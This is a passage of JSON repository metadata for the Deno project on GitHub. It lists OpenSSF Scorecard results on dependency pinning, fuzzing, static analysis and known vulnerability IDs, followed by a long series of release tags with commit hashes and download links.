https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G